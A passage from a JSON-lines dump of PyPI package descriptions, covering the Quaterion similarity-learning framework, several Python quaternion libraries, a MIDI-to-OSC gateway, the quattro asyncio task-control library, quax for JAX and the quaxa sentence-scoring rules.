perks.InstallationTL;DR:For training:pipinstallquaterionFor inference service:pipinstallquaterion-modelsQuaterion framework consists of two packages -quaterionandquaterion-models.Since it is not always possible or convenient to represent a model in ONNX format (also, itis supported), the Quaterion keeps a very minimal collection of model classes, which might be required for model inference, in aseparate package.It allows avoiding installing heavy training dependencies into inference infrastructure:pip install quaterion-modelsAt the same time, once you need to have a full arsenal of tools for training and debugging models, it is available in one package:pip install quaterionDocs \ud83d\udcd3Quick StartGuideMinimal workingexamplesFor a more in-depth dive, check out our end-to-end tutorials:Fine-tuning NLP models -Q&A systemsFine-tuning CV models -Similar Cars SearchTutorials for advanced features of the framework:Cache tutorial- How to make training fast.Head Layers: Skip Connection- How to avoid forgetting while fine-tuningEmbedding Confidence- how do I know that the model is sure about the output vector?Vector Collapse Prevention- how to prevent vector space collapse in Triplet LossCommunityJoin ourDiscord channelFollow us onTwitterSubscribe to ourNewslettersWrite us an emailinfo@qdrant.techLicenseQuaterion is licensed under the Apache License, Version 2.0. 
View a copy of the License file."} {"package": "quaterion-models", "pacakge-description": "Quaterion Models: quaterion-models is a part of Quaterion, a similarity learning framework.\nIt is kept as a separate package to make servable models lightweight and free from training dependencies. It contains definitions of the base classes used for model inference, as well as a collection of building blocks for building fine-tunable similarity learning models.\nThe documentation can be found here. If you are looking for the training-related part of Quaterion, please see the main repository instead. Install: pip install quaterion-models. It makes sense to install quaterion-models independently of the main framework if you already have a trained model\nand only need to run inference. Load and inference: from quaterion_models import SimilarityModel\n\nmodel = SimilarityModel.load(\"./path/to/saved/model\")\nembeddings = model.encode([\n    {\"description\": \"this is an example input\"},\n    {\"description\": \"you may have a different format\"},\n    {\"description\": \"the output will be a numpy array\"},\n    {\"description\": \"of size [batch_size, embedding_size]\"},\n])\nContent: SimilarityModel - the main class, which contains encoder models with the head layer; a base class for Encoders; a base class and various implementations of the Head Layers; additional helper functions"} {"package": "quaternion-algebra", "pacakge-description": "Quaternion arithmetic for Python. Usage:\n>>> from quaternion import Quaternion as H\n>>> q1 = H(2, 3, 2, 3)\n>>> q2 = H(3, 2, 3, 2)\n>>> q1 * q2\n(-12 + 8i + 12j + 18k)\n>>> q2 * q1\n(-12 + 18i + 12j + 8k)"} {"package": "quaternionarray", "pacakge-description": "Python module for multiplying, rotating and interpolating arrays of quaternions. Implemented in NumPy, making use of fast array operations. http://andreazonca.com/software/quaternion-array/"} {"package": "quaternionic", "pacakge-description": "Quaternionic arrays: This module subclasses numpy's array type, interpreting the array as an array of quaternions, and\naccelerating the algebra using numba. This enables natural manipulations, like multiplying\nquaternions as a*b, while also working with standard numpy functions, as in np.log(q). There is\nalso basic initial support for symbolic manipulation of quaternions by creating quaternionic arrays\nwith sympy symbols as elements, though this is a work in progress. This package has evolved from the quaternion package, which\nadds a quaternion dtype directly to numpy. In some ways, that is a better approach because dtypes\nare built in to numpy, making it more robust than this package. However, that approach has its own\nlimitations, including that it is harder to maintain, and requires much of the code to be written in\nC, which also makes it harder to distribute. This package is written entirely in python code, but\nshould actually have comparable performance because it is compiled by numba. Moreover, because the\ncore code is written in pure python, it is reusable for purposes other than the core purpose of this\npackage, which is to provide the numeric array type. Installation: Because this package is pure python code, installation is very simple. In particular, with\na reasonably modern installation, you can just run conda install -c conda-forge quaternionic or python -m pip install quaternionic. These will download and install the package.
(Usingpython -m pipinstead of justpiporpip3helps avoid problems that new python users frequently run into; the reason is explained by a veteran\npython core contributorhere.)You can also install the package from source if you havepipversion 10.0 or greater by runningpython -m pip install .\u2014 or if you havepoetryby runningpoetry install\u2014 from the top-level\ndirectory.Note that only python 3.8 or greater is supported. (I have also tried to support PyPy3, although\nI cannot test this asscipydoes not currently install. Pull requests are welcome.) In any case,\nI strongly recommend installing by way of an environment manager \u2014 especiallyconda, though other managers likevirtualenvorpipenvshould also work.For development work, the best current option ispoetry. From the\ntop-level directory, you can runpoetry run to run the command in an isolated\nenvironment.UsageBasic constructionThe key function isquaternionic.array, which takes nearly the same arguments asnumpy.array,\nexcept that whatever array will result must have a final axis of size 4 (and thedtypemust befloat). As long as these conditions are satisfied, we can create new arrays or just reinterpret\nexisting arrays:importnumpyasnpimportquaternionica=np.random.normal(size=(17,11,4))# Just some random numbers; last dimension is 4q1=quaternionic.array(a)# Reinterpret an existing arrayq2=quaternionic.array([1.2,2.3,3.4,4.5])# Create a new arrayIn this example,q1is an array of 187 (17*11) quaternions, just to demonstrate that any number of\ndimensions may be used, as long as the final dimension has size 4.Here, the original arrayawill still exist just as it was, and will behave just as a normal numpy\narray \u2014 including changing its values (which will change the values inq1), slicing, math, etc.\nHowever,q1will be another\"view\"into the same\ndata. Operations onq1will be quaternionic. For example, whereas1/areturns the element-wise\ninverse of each float in the array,1/q1returns thequaternionicinverse of each quaternion.\nSimilarly, if you multiply two quaternionic arrays, their product will be computed with the usual\nquaternion multiplication, rather than element-wise multiplication of floats as numpy usually\nperforms.:warning: WARNINGBecause of an unfortunate choice by the numpy developers, thenp.copyfunction will not preserve the quaternionic nature of an array by default; the result will just be a plain array of floats. You could pass the optional argumentsubok=True, as inq3 = np.copy(q1, subok=True), but it's easier to just use the member function:q3 = q1.copy().AlgebraAll the usual quaternion operations are available, includingAdditionq1 + q2Subtractionq1 - q2Multiplicationq1 * q2Divisionq1 / q2Scalar multiplicationq1 * s == s * q1Scalar divisionq1 / sands / q1Reciprocalnp.reciprocal(q1) == 1/q1Exponentialnp.exp(q1)Logarithmnp.log(q1)Square-rootnp.sqrt(q1)Conjugatenp.conjugate(q1) == np.conj(q1)All numpyufuncsthat make sense for\nquaternions are supported. 
When the arrays have different shapes, the usual numpybroadcastingrules take effect.AttributesIn addition to the basic numpy array features, we also have a number of extra properties that are\nparticularly useful for quaternions, includingMethods to extract and/or set componentsw,x,y,zi,j,k(equivalent tox,y,z)scalar,vector(equivalent tow, [x,y,z])real,imag(equivalent toscalar,vector)Methods related to normsabs(square-root of sum of squares of components)norm(sum of squares of components)modulus,magnitude(equal toabs)absolute_square,abs2,mag2(equal tonorm)normalizedinverseMethods related to array infrastructurendarray(the numpy array underlying the quaternionic array)flattened(all dimensions but last are flattened into one)iterator(iterate over all quaternions)Note that this package makes a distinction betweenabsandnorm\u2014 the latter being equal to the\nsquare of the former. This version of the norm is also known as the \"Cayley\" norm, commonly used\nwhen emphasizing the properties of an object in an algebra, as opposed to the \"Euclidean\" norm more\ncommon when emphasizing the properties of an object in a vector space \u2014 though of course, algebras\nare vector spaces with additional structure. This choice agrees with theBoost library's\nimplementation of\nquaternions,\nas well as this package's forerunnerquaternion.\nThis also agrees with the corresponding functions on theC++ standard library's complex\nnumbers. Because this may be confusing, a number\nof aliases are also provided that may be less confusing. For example, some people find the pairabsandabs2(meaning the square ofabs) to be more sensible.RotationsThe most common application of quaternions is to representing rotations by means of unit\nquaternions. Note that this package does notrestrictquaternions to have unit norms, since it is\nusually better for numerical purposes not to do so. For example, whereas rotation of a vector $v$\nby a quaternion is usually implemented as $R, v, \\bar{R}$, it is generally better to drop the\nassumption that the quaternion has unit magnitude and implement rotation as $R, v, R^{-1}$. This\nis almost always more efficient, and more accurate. That is what this package does by default\nwhenever rotations are involved.Although this package does not restrict to unit quaternions, there are several converters to and\nfrom other representations of rotations. First, we haveto_vector_part,from_vector_partThese convert between the standard 3-d vector representation and their equivalent quaternions, which\nallows them to be manipulated as vectors \u2014 as inR * from_vector_part(v) * R.conjugate(). However,\nnote that you may not need to convert to/from quaternions. For example, to rotate vectorsvbyR, you can useR.rotate(v)It may also be relevant to consider a vector as a \"generator\" of\nrotations, in which case the actual rotation is obtained by applyingexpto the generator. Thisdoesrequire conversion to a quaternionic array. We also have converters that deal with standard\nrepresentations of rotations:to_rotation_matrix,from_rotation_matrixto_transformation_matrix(for non-unit quaternions)to_axis_angle,from_axis_angleto_euler_angles,from_euler_angles(though using Euler angles is almost always a bad idea)to_euler_phases,from_euler_phases(see above)to_spherical_coordinates,from_spherical_coordinatesto_angular_velocity,from_angular_velocityto_minimal_rotationNote that the last two items relate to quaternion-valued functions of time. 
Converting to an angular\nvelocity requires differentiation, while converting from angular velocity requires integration (as\nexplored inthis paper). The\"minimal rotation\"modifies an input rotation-function-of-time to\nhave the same effect on thezaxis, while minimizing the amount of rotation that actually happens.For these converters, the \"to\" functions are properties on the individual arrays, whereas the \"from\"\nfunctions are \"classmethod\"s that take the corresponding objects as inputs. For example, we could\nwriteq1=quaternionic.array(np.random.rand(100,4)).normalizedm=q1.to_rotation_matrixto obtain the matrixmfroma quaternionic arrayq1. (Here,mis actually a series of 100\n3x3 matrices corresponding to the 100 quaternions inq1.) On the other hand, to obtain a\nquaternionic array from some matrixm, we would writeq2=quaternionic.array.from_rotation_matrix(m)Also note that, because the unit quaternions form a \"double cover\" of the rotation group (meaning\nthat quaternionsqand-qrepresent the same rotation), these functions are not perfect inverses\nof each other. In this case, for example,q1andq2may have opposite signs. We can, however,\nprove that these quaternions represent the same rotations by measuring the \"distance\" between the\nquaternions as rotations:np.max(quaternionic.distance.rotation.intrinsic(q1,q2))# Typically around 1e-15Also note the classmethodrandomThis constructs a quaternionic array in which each component is randomly selected from a normal\n(Gaussian) distribution centered at 0 with scale 1, which means that the result is isotropic\n(spherically symmetric). It is also possible to pass thenormalizeargument to this function,\nwhich results in truly random unit quaternions.Distance functionsThequaternionic.distancecontains four distance functions:rotor.intrinsicrotor.chordalrotation.intrinsicrotation.chordalThe \"rotor\" distances do not account for possible differences in signs, meaning that rotor distances\ncan be large even when they represent identical rotations; the \"rotation\" functions just return the\nsmaller of the distance betweenq1andq2or the distance betweenq1and-q2. So, for\nexample, either \"rotation\" distance betweenqand-qis always zero, whereas neither \"rotor\"\ndistance betweenqand-qwill ever be zero (unlessqis zero). The \"intrinsic\" functions\nmeasure the geodesic distance within the manifold ofunitquaternions, and is somewhat slower but\nmay be more meaningful; the \"chordal\" functions measure the Euclidean distance in the (linear) space\nof all quaternions, and is faster but its precise value is not necessarily as meaningful.These functions satisfy some important conditions. 
For each of these functionsd, and for any\nnonzero quaternionsq1andq2, andunitquaternionsq3andq4, we havesymmetry:d(q1, q2) = d(q2, q1)invariance:d(q3*q1, q3*q2) = d(q1, q2) = d(q1*q4, q2*q4)identity:d(q1, q1) = 0positive-definiteness:For rotor functionsd(q1, q2) > 0wheneverq1 \u2260 q2For rotation functionsd(q1, q2) > 0wheneverq1 \u2260 q2andq1 \u2260 -q2Note that the rotation functions also satisfy both the usual identity propertyd(q1, q1) = 0and\nthe opposite-identity propertyd(q1, -q1) = 0.SeeMoakher (2002)for a nice general discussion.InterpolationFinally, there are also capabilities related to interpolation, for example as functions of time:slerp (spherical linear interpolation)squad (spherical quadratic interpolation)Related packagesOther python packages with some quaternion features includequaternion(core written in C; very fast; adds\nquaterniondtypeto numpy; namednumpy-quaternionon pypi due to name conflict)clifford(very powerful; more general geometric algebras)rowan(many features; similar approach to this package;\nno acceleration or overloading)pyquaternion(many features; pure python; no\nacceleration or overloading)quaternions(basic pure python package; no\nacceleration; specialized for rotations only)scipy.spatial.transform.Rotation.as_quat(quaternion output forRotationobject)mathutils(a Blender package with python\nbindings)Quaternion(extremely limited capabilities; unmaintained)Also note that there is some capability to do symbolic manipulations of quaternions in these\npackages:galgebra(more general geometric algebras; analogous toclifford, but for symbolic calculations)sympy.algebras.quaternion"} +{"package": "quaternionmath", "pacakge-description": "Quaternionmath consists of a \u201cQuaternion\u201d class, which defines the Quaternion\n(four-dimensional) numbers. The class provides addition, subtraction,\nmultiplication, and division logic, as well as string and representation\ninformation."} +{"package": "quaternions", "pacakge-description": "A library to handle quaternions. The library is partly tested (see tests). It\nwould be great to get everything (edge cases and functions) under testing.There are some great resources out there on quaternions. A few of particular use:Ancient NASA paperWikipediaGeometric Tools Paper (lots on interpolation)Euclidean Space Quaternions PageLicense:The MIT License (MIT)Copyright (c) 2016 GTRC.Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "quaternions-for-python", "pacakge-description": "Class and mathematical functions for quaternion numbers.InstallationPythonThis is a Python 3 module. If you don\u2019t have Python installed, get the latest\nversionhere.The Quaternions moduleInstall with pip:pip install quaternions-for-pythonIf you want to build from source, you can clone the repository with the following\nterminal command:git clone https://github.com/zachartrand/Quaternions.gitHow to useUsing the quaternions moduleThe quaternions module is designed to be imported to use quaternion numbers\njust like complex numbers in Python. The rest of this file assumes you\nimport the class like this:>>> from quaternions import QuaternionTo create a quaternion, simply type>>> Quaternion(a, b, c, d)where a, b, c, and d correspond to a quaternion of the forma + bi + cj + dk.\nFor example, creating the quaternion1 - 2i - 3j + 4klooks like this in the\nPython interpreter:>>> q1 = Quaternion(1, -2, -3, 4)\n>>> q1\nQuaternion(1.0, -2.0, -3.0, 4.0)\n>>> print(q1)\n(1 - 2i - 3j + 4k)Quaternions have mathematical functionality built in. Adding or multipling two\nquaternions together uses the same syntax as ints and floats:>>> q1, q2 = Quaternion(1, -2, -3, 4), Quaternion(1, 4, -3, -2)\n>>> print(q1)\n(1 - 2i - 3j + 4k)\n>>> print(q2)\n(1 + 4i - 3j - 2k)\n>>> print(q1+q2)\n(2 + 2i - 6j + 2k)\n>>> print(q1-q2)\n(-6i + 0j + 6k)\n>>> print(q2-q1)\n(6i + 0j - 6k)\n>>> print(q1*q2)\n(8 + 20i + 6j + 20k)\n>>> print(q2*q1)\n(8 - 16i - 18j - 16k)\n>>> print(q1/q2)\n(-0.19999999999999996 - 0.8i - 0.4j - 0.4k)\n>>> print(1/q2 * q1)\n(-0.19999999999999996 + 0.4i + 0.4j + 0.8k)\n>>> print(q2/q1)\n(-0.19999999999999996 + 0.8i + 0.4j + 0.4k)Check the documentation for other useful methods of the Quaternion class.Using the qmath moduleThe qmath module contains some functions that are compatible with quaternions,\nsimilarly to how thecmathmodule works. These include the exponential function,\nthe natural logarithm, and the square root function. It also includes a function,rotate3d(), that takes an iterable of coordinates and rotates them a given angle\naround a given axis (the z-axis by default). Here is an example rotating the point(1, 0, 0)around the z-axis:>>> from quaternions import qmath\n>>>\n>>> p = (1, 0, 0)\n>>>\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, 1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(-1.0, 0.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, -1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(1.0, 0.0, 0.0)"} +{"package": "quaternions-for-python-zachartrand", "pacakge-description": "Class and mathematical functions for quaternion numbers.InstallationPythonThis is a Python 3 module. If you don\u2019t have Python installed, get the latest\nversionhere.The Quaternions moduleInstall with pip:pip install quaternions-for-pythonIf you want to build from source, you can clone the repository with the following\nterminal command:git clone https://github.com/zachartrand/Quaternions.gitHow to useUsing the quaternions moduleThe quaternions module is designed to be imported to use quaternion numbers\njust like complex numbers in Python. 
The rest of this file assumes you\nimport the class like this:>>> from quaternions import QuaternionTo create a quaternion, simply type>>> Quaternion(a, b, c, d)where a, b, c, and d correspond to a quaternion of the forma + bi + cj + dk.\nFor example, creating the quaternion1 - 2i - 3j + 4klooks like this in the\nPython interpreter:>>> q1 = Quaternion(1, -2, -3, 4)\n>>> q1\nQuaternion(1.0, -2.0, -3.0, 4.0)\n>>> print(q1)\n(1 - 2i - 3j + 4k)Quaternions have mathematical functionality built in. Adding or multipling two\nquaternions together uses the same syntax as ints and floats:>>> q1, q2 = Quaternion(1, -2, -3, 4), Quaternion(1, 4, -3, -2)\n>>> print(q1)\n(1 - 2i - 3j + 4k)\n>>> print(q2)\n(1 + 4i - 3j - 2k)\n>>> print(q1+q2)\n(2 + 2i - 6j + 2k)\n>>> print(q1-q2)\n(-6i + 0j + 6k)\n>>> print(q2-q1)\n(6i + 0j - 6k)\n>>> print(q1*q2)\n(8 + 20i + 6j + 20k)\n>>> print(q2*q1)\n(8 - 16i - 18j - 16k)\n>>> print(q1/q2)\n(-0.19999999999999996 - 0.8i - 0.4j - 0.4k)\n>>> print(1/q2 * q1)\n(-0.19999999999999996 + 0.4i + 0.4j + 0.8k)\n>>> print(q2/q1)\n(-0.19999999999999996 + 0.8i + 0.4j + 0.4k)Check the documentation for other useful methods of the Quaternion class.Using the qmath moduleThe qmath module contains some functions that are compatible with quaternions,\nsimilarly to how thecmathmodule works. These include the exponential function,\nthe natural logarithm, and the square root function. It also includes a function,rotate3d(), that takes an iterable of coordinates and rotates them a given angle\naround a given axis (the z-axis by default). Here is an example rotating the point(1, 0, 0)around the z-axis:>>> from quaternions import qmath\n>>>\n>>> p = (1, 0, 0)\n>>>\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, 1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(-1.0, 0.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, -1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(1.0, 0.0, 0.0)"} +{"package": "quatlib", "pacakge-description": "This is a very basic quaternion library for transformation between quaternion, Rotation matrix, Euler angle and many more. 
It has the following conversion abilities: Axis and angle to quaternion using the function 'axisAngle2quatern(axis, angle)'; Axis and angle to Rotation matrix using the function 'axisAngle2rotMat(axis, angle)'; Euler angle to Rotation matrix using the function 'euler2rotMat(phi, theta, psi)'; Quaternion to Euler angle using the function 'quatern2euler(q)'; Quaternion to Rotation matrix using the function 'quatern2rotMat(q)'; Converts a quaternion to its conjugate using the function 'quaternConj(q)'; Calculates the quaternion product of quaternions a and b using the function 'quaternProd(a, b)'; Rotation matrix to Euler angle using the function 'rotMat2euler(R)'; Rotation matrix to quaternion using the function 'rotMat2quatern(R)'. Input & Output Datatypes: Angles: Radian (float); Quaternion: array [qw, qx, qy, qz]; Axis: array [x, y, z]; Rotation Matrix: in (3x3) matrix/array form, like\nR11 R12 R13\nR21 R22 R23\nR31 R32 R33\nChange Log: 0.0.1 (23/11/2022) First Release; 0.1.0 (23/11/2022) Second release: fixing some known bugs for a stable release"} {"package": "quatorzeheures", "pacakge-description": "A mono-directional MIDI to OSC gateway. Dumps all MIDI sources using amidi (requires\nthe alsa-utils package) and sends MIDI bytes as an OSC UDP stream /midi/. Features: Generate a single OSC stream from multiple MIDI sources; Handle live new connections and disconnections of MIDI sources. Example:\n$ quatorzeheures 192.168.1.42:1214\n2016-08-12 02:47:44,653 stream OSC to udp://192.168.1.42:1214\n2016-08-12 02:47:44,662 connect Akai MPD18 MIDI 1 on port hw:2\n2016-08-12 02:47:49,223 Akai MPD18 MIDI 1 [176, 7, 37] --> '/midi/Akai_MPD18_MIDI_1\\x00,iii\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x07\\x00\\x00\\x00%'\n2016-08-12 02:47:49,223 Akai MPD18 MIDI 1 [144, 10, 32] --> '/midi/Akai_MPD18_MIDI_1\\x00,iii\\x00\\x00\\x00\\x00\\x00\\x90\\x00\\x00\\x00\\n\\x00\\x00\\x00 '\nUse with puredata: Download patch. Installation: Debian jessie package: Debian packaging is done in the debian/unstable branch and\navailable in my jessie-backports repository (for i386, amd64 and armhf\narchitectures):\nwget -q -O - https://apt.philpep.org/951808A4.asc | sudo apt-key add -\necho \"deb http://apt.philpep.org jessie-backports main\" | sudo tee /etc/apt/sources.list.d/philpep.list\nsudo apt-get update\n\nsudo apt-get install quatorzeheures\nThe package comes with a systemd service quatorzeheures enabled; the target host\ncan be customized in /etc/default/quatorzeheures. pip: pip install quatorzeheures"} {"package": "quat-to-euler", "pacakge-description": "Quat_to_euler: Adds a quaternion-to-Euler Unity-like method to the numpy-quaternion module. Originally based on code by Mike Boyle (\"https://github.com/moble/quaternion\"). The basic requirements for this code are current versions of python, numpy and\nmoble numpy-quaternion. Quick install: pip install --user quat_to_euler"} {"package": "quattro", "pacakge-description": "quattro: task control for asyncio. quattro is an Apache 2 licensed library, written in Python, for task control in asyncio applications. quattro is influenced by structured concurrency concepts from the Trio framework. quattro supports Python versions 3.9 - 3.11, including PyPy. Installation: To install quattro, simply: $ pip install quattro. quattro.gather: quattro comes with an independent, simple implementation of asyncio.gather based on Task Groups.\nThe quattro version is safer, and uses a task group under the hood to not leak tasks in cases of errors in child tasks. from quattro import gather\n\nasync def my_handler():\n    res_1, res_2 = await gather(long_query_1(), long_query_2())\nThe return_exceptions argument can be used to
makegather()catch and return exceptions as responses instead of letting them bubble out.fromquattroimportgatherasyncdefmy_handler():res_1,res_2=awaitgather(long_query_1(),long_query_2(),return_exceptions=True,)# res_1 and res_2 may be instances of exceptions.The differences toasyncio.gather()are:If a child task fails other unfinished tasks will be cancelled, just like in a TaskGroup.quattro.gather()only accepts coroutines and not futures and generators, just like a TaskGroup.Whenreturn_exceptionsis false (the default), an exception in a child task will cause an ExceptionGroup to bubble out of the top-levelgather()call, just like in a TaskGroup.Results are returned as a tuple, not a list.Cancel Scopesquattrocontains an independent, asyncio implementation ofTrio CancelScopes.\nDue to fundamental differences between asyncio and Trio the actual runtime behavior isn't exactly the same, but close.fromquattroimportmove_on_afterasyncdefmy_handler():withmove_on_after(1.0)ascancel_scope:awaitlong_query()# 1 second later, the function continues runningquattrocontains the following helpers:move_on_aftermove_on_atfail_afterfail_atAll helpers produce instances ofquattro.CancelScope, which is largely similar to the Trio variant.CancelScopeshave the following attributes:cancel()- a method through which the scope can be cancelled manually.cancel()can be called before the scope is entered; entering the scope will cancel it at the first opportunitydeadline- read/write, an optional deadline for the scope, at which the scope will be cancelledcancelled_caught- a readonly bool property, whether the scope finished via cancellationquattroalso supports retrieving the current effective deadline in a task usingquattro.current_effective_deadline.\nThe current effective deadline is a float value, withfloat('inf')standing in for no deadline.Python versions 3.11 and higher containsimilar helpers,asyncio.timeoutandasyncio.timeout_at.\nThequattrofail_afterandfail_athelpers are effectively equivalent to the asyncio timeouts, and pass the test suite for them.The differences are:Thequattroversions are normal context managers (used with justwith), asyncio versions are async context managers (usingasync with).\nNeither version needs to be async since nothing is awaited;quattrochooses to be non-async to signal there are no suspension points being hit, match Trio and be a little more readable.quattroadditionally contains themove_on_atandmove_on_afterhelpers.Thequattroversions support getting the current effective deadline.Thequattroversions can be cancelled manually usingscope.cancel(), and precancelled before they are enteredThequattroversions are available on all supported Python versions, not just 3.11+.asyncio and Trio differencesfail_afterandfail_atraiseasyncio.Timeoutinstead oftrio.Cancelledexceptions when they fail.asyncio has edge-triggered cancellation semantics, while Trio has level-triggered cancellation semantics.\nThe following example will behave differently inquattroand Trio:withtrio.move_on_after(TIMEOUT):conn=make_connection()try:awaitconn.send_hello_msg()finally:awaitconn.send_goodbye_msg()In Trio, if theTIMEOUTexpires while awaitingsend_hello_msg(),send_goodbye_msg()will also be cancelled.\nInquattro,send_goodbye_msg()will run (and potentially block) anyway.\nThis is a limitation of the underlying framework.Inquattro, cancellation scopes cannot be shielded.Task GroupsOn Python 3.11 and later, thestandard library TaskGroupimplementation is used instead.\nThe TaskGroup implementation here can be considered a 
backport for older Python versions.quattrocontains a TaskGroup implementation. TaskGroups are inspired byTrio nurseries.fromquattroimportTaskGroupasyncdefmy_handler():# We want to spawn some tasks, and ensure they are all handled before we return.asyncdeftask_1():...asyncdeftask_2():...asyncwithTaskGroup()astg:t1=tg.create_task(task_1)t2=tg.create_task(task_2)# The end of the `async with` block awaits the tasks, ensuring they are handled.TaskGroups are essential building blocks for achieving the concept ofstructured concurrency.\nIn simple terms, structured concurrency means your code does not leak tasks - when a coroutine\nfinishes, all tasks spawned by that coroutine and all its children are also finished.\n(In fancy terms, the execution flow becomes a directed acyclic graph.)Structured concurrency can be achieved by using TaskGroups instead ofasyncio.create_taskto start background tasks.\nTaskGroups essentially do two things:when exiting from a TaskGroupasync withblock, the TaskGroup awaits all of its children, ensuring they are finished when it exitswhen a TaskGroup child task raises an exception, all other children and the task inside the context manager are cancelledThe implementation has been borrowed from the EdgeDB project.Changelog23.1.0 (2023-11-29)Introducequattro.gather.\n(#5)Add support for Python 3.12.Switch toPDM.22.2.0 (2022-12-27)More robust nested cancellation on 3.11.Better typing support forfail_afterandfail_at.Improve effective deadline handling for pre-cancelled scopes.TaskGroups now support custom ContextVar contexts when creating tasks, just like the standard library implementation.22.1.0 (2022-12-19)Restore TaskGroup copyright notice.TaskGroups now raise ExceptionGroups (using the PyPI backport when necessary) on child errors.Add support for Python 3.11, drop 3.8.TaskGroups no longer have anameand therepris slightly different, to harmonize with the Python 3.11 standard library implementation.TaskGroups no longer swallow child exceptions when aborting, to harmonize with the Python 3.11 standard library implementation.Switch to CalVer.0.3.0 (2022-01-08)Addpy.typedto enable typing information.Flesh out type annotations for TaskGroups.0.2.0 (2021-12-27)Addquattro.current_effective_deadline.0.1.0 (2021-12-08)Initial release, containing task groups and cancellation scopes.CreditsThe initial TaskGroup implementation has been taken from theEdgeDBproject.\nThe CancelScope implementation was heavily influenced byTrio, and inspired by theasync_timeoutpackage."} +{"package": "quaver", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quaver.py", "pacakge-description": "# quaver.py\nA Python API Wrapper for Quaver (Rhythm Game) API"} +{"package": "quax", "pacakge-description": "QuaxJAX + multiple dispatch + custom array-ish objects, e.g.:LoRA weight matricessymbolic zerosarrays with named dimensionsstructured (e.g. tridiagonal) matricessparse arraysquantised arraysarrays with physical units attachedetc! (See the built-inquax.exampleslibrary for most of the above!)For example, this can be mean overloading matrix multiplication to exploit sparsity or structure, or automatically rewriting a LoRA's matmul(W + AB)vinto the more-efficientWv + ABv.This works via a custom JAX transform. Take an existing JAX program, wrap it in aquax.quaxify, and then pass in the custom array-ish objects. 
This means it will work even with existing programs, that were not written to accept such array-ish objects!(Just like howjax.vmaptakes a program, but reinterprets each operation as its batched version, so to willquax.quaxifytake a program and reinterpret each operation according to what array-ish types are passed.)Installationpip install quaxDocumentationAvailable athttps://docs.kidger.site/quax.Example: LoRAThis example demonstrates everything you need to use the built-inquax.examples.loralibrary.--8<-- \".lora-example.md\"Work in progress!Right now, the following are not supported:Control flow primitives (e.g.jax.lax.cond).jax.custom_vjpIt should be fairly straightforward to add support for these; open an issue or pull request.See also: other libraries in the JAX ecosystemEquinox: neural networks.jaxtyping: type annotations for shape/dtype of arrays.Optax: first-order gradient (SGD, Adam, ...) optimisers.Diffrax: numerical differential equation solvers.Optimistix: root finding, minimisation, fixed points, and least squares.Lineax: linear solvers.BlackJAX: probabilistic+Bayesian sampling.Orbax: checkpointing (async/multi-host/multi-device).sympy2jax: SymPy<->JAX conversion; train symbolic expressions via gradient descent.Eqxvision: computer vision models.Levanter: scalable+reliable training of foundation models (e.g. LLMs).PySR: symbolic regression. (Non-JAX honourable mention!)AcknowledgementsSignificantly inspired byhttps://github.com/davisyoshida/qax,https://github.com/stanford-crfm/levanter, andjax.experimental.sparse."} +{"package": "quaxa", "pacakge-description": "QUAXA: QUAlity of sentence eXAmples scoringRule-based sentence scoring algorithm based on GDEX.RulesFormelscore = 0.5 * isnoknockout + 0.5 * gesamtfaktorKnock-out KritierenWenn 1 Knock-out Kriterium identifiziert wird, dann wird direkt der Score direkt um 0.5 (von 1.0) gesenkt.FunktionAusgabeBeschreibungHinweishas_finite_verb_and_subjectboolDer Satz hat ein finites Verb und ein Subjekt, wovon eines Root des Dependenzbaum ist oder via beide \u00fcber Root Node verkn\u00fcpft sind.[1] GDEX whole sentenceis_misparsedboolDas 1. Zeichen des Strings ist kleingeschrieben, ein Leerzeichen oder eine Punktuation; oder das letzte Zeichen ist keine Punktuation.[1] GDEX whole sentencehas_illegal_charsboolString enh\u00e4lt Kontrolzeichen (ASCII 0-31), oder die Zeichen `<>[]/^@'` (z.B. HTML Tags, Markdown Hyperlinks, Dateipfade, E-Mail, u.a.)has_blacklist_wordsboolSatzbeleg enth\u00e4lt W\u00f6rter, sodass in keinem Fall der Satzbeleg als W\u00f6rterbuchbeispiel in Betracht gezogen wird; ausgenommen das Blacklist-Wort ist selbt der W\u00f6rterbucheintrag. (dt. Blacklist ist voreingestellt)[1] GDEX blacklistDiskontierungsfakorenJe Kriterium wird ein Faktor berechnet, und alle Faktoren miteinander multipliziert.\nWenn bspw. ein Faktor eine Penality von 0.1 bekommt, dann ist der Faktor 0.9.\nF\u00fcr den Gesamtscore wird der Gesamtfaktor mit 0.5 multipliziert.FunktionAusgabeBeschreibungHinweisfactor_rarechars[0.0, 1.0]Strafe f\u00fcr jedes Zeichen, was0123456789\\'.,!?)(;:-ist (Zahlen bzw. lange Zahlen;.f\u00fcr Abk.; mehrere Punktuationen; Bindestrichw\u00f6rter, u.a.)[1] GDEX rare charsfactor_notkeyboardchar[0.0, 1.0]Der Prozentsatz der Zeichen, die mit einem deutsche Tastaturlayout getippt werden k\u00f6nnen.n.a.factor_graylist_words[0.0, 1.0]Strafe Satzbelege ab, wenn Lemma auf einer Graylist steht; ausgenommen das Graylist-Wort ist 